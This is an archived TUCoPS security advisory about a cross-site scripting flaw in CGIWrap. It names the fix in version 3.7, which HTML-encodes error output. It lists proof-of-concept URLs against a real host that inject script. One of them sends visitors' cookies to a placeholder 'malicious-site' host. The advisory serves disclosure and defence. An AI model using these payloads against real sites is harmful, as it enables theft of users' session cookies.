Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: cgiwrap1.htm

CGIWrap - cookies can be stolen



COMMAND

    CGIWrap

SYSTEMS AFFECTED

    CGIWrap

PROBLEM

    Takagi  Hiromitsu  found   following.   He   found  a   cross-site
    scripting vulnerability in CGIWrap.  Cookies issued by the  server
    on  which  CGIWrap  is  installed  can  be  stolen.  Please try to
    access the following URLs.

    Confirming the bug:

        http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
        http://www.unixtools.org/cgi-bin/cgiwrap/<S>
        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

    JavaScript code will be executed:

        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
        http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

    Stealing your Cookies issued by www.unixtools.org, if any:

        http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>

SOLUTION

    This has just  been corrected in  version 3.7 which  has just been
    released:

        http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

    All  error  message  output  is  now  html encoded to prevent this
    problem.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH